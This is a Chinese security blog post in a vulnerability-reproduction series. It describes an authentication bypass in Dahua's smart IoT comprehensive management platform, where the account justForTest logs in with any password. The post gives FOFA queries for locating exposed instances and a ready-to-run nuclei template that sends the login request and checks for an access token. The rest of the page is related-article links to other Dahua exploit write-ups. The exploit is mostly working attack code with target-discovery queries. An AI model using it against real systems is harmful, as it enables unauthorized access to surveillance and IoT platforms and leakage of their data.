大华智能物联综合管理平台justForTest用户登录漏洞

最新推荐文章于 2024-06-15 08:30:00 发布
最新推荐文章于 2024-06-15 08:30:00 发布
阅读量1.6k 收藏 10
点赞数 10
分类专栏: 0/1day漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39573664/article/details/135225686
版权

0x01 产品简介

 浙江大华技术股份有限公司,是全球领先的以视频为核心的智慧物联解决方案提供商和运营服务商。

0x02 漏洞概述

浙江大华技术股份有限公司智能物联综合管理平台 用户登录接口/evo-apigw/evo-oauth/oauth/token存在漏洞,使用用户justForTest/任意密码即可成功登录平台,造成信息泄露。

0x03 影响范围

大华智能物联综合管理平台

0x04 复现环境

fofa
icon_hash="-1935899595"
body="*客户端会小于800*"

0x05 漏洞复现

nuclei脚本

id: dahua-icc-oauth
info:
  name: 大华智能物联综合管理平台存在逻辑漏洞,可任意用户登录
  author: xxx
  severity: high
  description: |
    大华ICC智能物联综合管理平台存在逻辑漏洞,可任意用户登录。
  tags: 2023,dahua
  metadata:
    max-request: 2
    fofa-query: body="*客户端会小于800*"
    verified: true

requests:
  - raw:
      - |
        POST /evo-apigw/evo-oauth/oauth/token HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
        Content-Length: 109
        Content-Type: application/x-www-form-urlencoded
        Accept-Encoding: gzip
        Connection: close

        username=justForTest&password=1&grant_type=password&client_id=web_client&client_secret=web_client&public_key=
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code==200 && contains(body,"access_token")'

时光匆匆逝,期年如梦
关注
  • 10
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
漏洞复现】大华ICC智能物联综合管理平台任意文件读取漏洞
晚风不及你
03-10 1043
大华智能物联综合管理平台 iConnection Center(以下简称:ICC平台),是一套基于智能物联综合业务管理平台软件,具备强大的后台服务能力,配套了B/S管理员端、C/S客户端、移动APP终端、小程序等不同应用端,满足用户各种使用需求。
大华智能物联综合管理平台justForTest用户登录漏洞(含批量验证poc)
weixin_43567873的博客
04-22 975
大华智能物联综合管理平台justForTest用户登录漏洞(含批量验证poc)
just-for-test:只是为了个人测试
04-16
只是为了测试 只是为了个人测试
0day未公开 大华 ICC 智慧校园综合管理平台垂直越权漏洞
最新发布
weixin_43167326的博客
06-15 604
大华ICC智能物联综合管理平台对技术组件进行模块化和松耦合,将解决方案分层分级,提高面向智慧物联的数据接入与生态合作能力。大华ICC智能物联综合管理平台对技术组件进行模块化和松耦合,将解决方案分层分级,提高面向智慧物联的数据接入与生态合作能力。
大华智能物联综合管理平台任意文件读取
weixin_43567873的博客
03-07 190
大华智能物联综合管理平台任意文件读取(QVD-2023-45063)
漏洞复现】大华-智能物联综合管理平台-token-默认口令
知黑而守白
02-01 166
浙江大华技术股份有限公司智能物联综合管理平台是一款基于物联网技术的综合管理平台,旨在为企业和用户提供智能化、便捷化的物联网解决方案。该平台整合了大华技术在视频监控、数据采集、数据分析等方面的核心技术,实现了对各类物联网设备的统一管理和控制,提高了企业的运营效率和管理水平。智能物联综合管理平台存在默认密码漏洞,通过默认用户名密码可以访问后台。
漏洞复现】大华智能物联ICC综合管理平台弱口令漏洞
晚风不及你
02-23 1225
大华智能物联ICC综合管理平台是一个集成了多种智能物联应用服务能力的平台。该平台提供了一系列的基础能力,如中台基础能力、各智能物联应用服务能力以及周边生态支持。
大华智能物联综合管理平台readpic接口任意文件读取漏洞复现 [附POC]
薛定谔嘚喵博客
11-21 674
大华ICC智能物联综合管理平台对技术组件进行模块化和松耦合,将解决方案分层分级,提高面向智慧物联的数据接入与生态合作能力。该系统存在任意文件读取漏洞,会造成敏感信息泄露。
漏洞复现】大华-智慧园区综合管理平台-wpms-deleteftp-远程命令执行
知黑而守白
02-01 166
大华智慧园区综合管理平台是一款基于云计算、大数据、人工智能等技术的智慧园区管理解决方案,可为园区提供运营管理综合安防、便捷通行、协同办公等多项功能,帮助园区实现安全等级提升、工作效率提升、管理成本下降。大华智慧园区综合管理平台 deleteftp 接口处存在远命令执行漏洞,使得攻击者可以通过构造特定的请求远程执行恶意代码。此漏洞可能导致攻击者获取系统权限、执行任意命令,严重威胁系统的机密性和完整性。
大华智能物联综合管理平台 fastjson远程代码执行漏洞复现
0xSec
05-11 1262
​由于大华智能物联综合管理平台使用了存在漏洞的FastJson组件,未经身份验证的攻击者可利用/evo-runs/v1.0/auths/sysusers/random接口发送恶意的序列化数据执行任意指令,造成代码执行。
【精品】大华“智慧消防” 物联综合管理解决方案.pptx
06-25
【精品】大华“智慧消防” 物联综合管理解决方案.pptx
evo-gateway:Evolution Gateway-物联网云的本地网关
05-23
进化网关 Evolution Gateway-物联网云的本地网关
evoclass状态::evoclass상태이지
02-22
evoclass상태이지
just for test
03-07
just for test,do not download this
kingCMS 建站cms
12-18
kingCMS 提供了一整套功能强大的建站解决方案,允许用户轻松创建、管理和维护网页内容,而无需深入理解编程语言的复杂性。 1. **建站程序**: kingCMS 的建站程序设计得简洁易用,它包含了网站设计所需的基本元素...
《安卓考试》Eclipse项目
03-28
Eclipse是早期Android开发中广泛使用的工具,它提供了丰富的功能,包括代码编辑、调试、构建以及项目管理等。 在Android开发中,Eclipse扮演着核心角色。它配备了一个名为ADT(Android Developer Tools)的插件,为...
漏洞复现】大华-智能物联综合管理平台-page-信息泄露
知黑而守白
02-01 283
浙江大华技术股份有限公司智能物联综合管理平台是一款基于物联网技术的综合管理平台,旨在为企业和用户提供智能化、便捷化的物联网解决方案。该平台整合了大华技术在视频监控、数据采集、数据分析等方面的核心技术,实现了对各类物联网设备的统一管理和控制,提高了企业的运营效率和管理水平。智能物联综合管理平台 page 接口处存在信息泄漏。攻击者可通过构造特定的数据包可以获取系统敏感信息。
漏洞复现】大华智能物联综合管理平台 fastjson远程代码执行漏洞
siu~
05-29 1280
由于大华智能物联综合管理平台使用了存在漏洞的Fastson组件,未经身份验让的攻击者可利用 /ev0-uns/v1.0/auths/sysusers/random接口发送恶意的序列化数据执行任意指令,造成代码执行。
$ git remote -v my_git_test https://github.com/BKcamptain/git-JustForTest (fetch) my_git_test https://github.com/BKcamptain/git-JustForTest (push) upstream https://github.com/otale/tale.git (fetch) upstream https://github.com/otale/tale.git (push)我的地址正确吗
06-09
根据你提供的信息,远程仓库的地址看起来没有问题,可以正常访问。但是你在执行 `git push` 命令时出现了 "Recv failure: Connection was reset" 的错误,这可能是由于网络问题导致的。你可以尝试检查网络连接,或者尝试更换网络环境再次进行操作。如果还是无法解决问题,可以尝试执行以下命令: ``` git config --global http.postBuffer 524288000 ``` 这个命令会将 Git 的缓存区大小调整为 500 MB,可以避免一些网络问题。希望这个方法可以帮到你。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值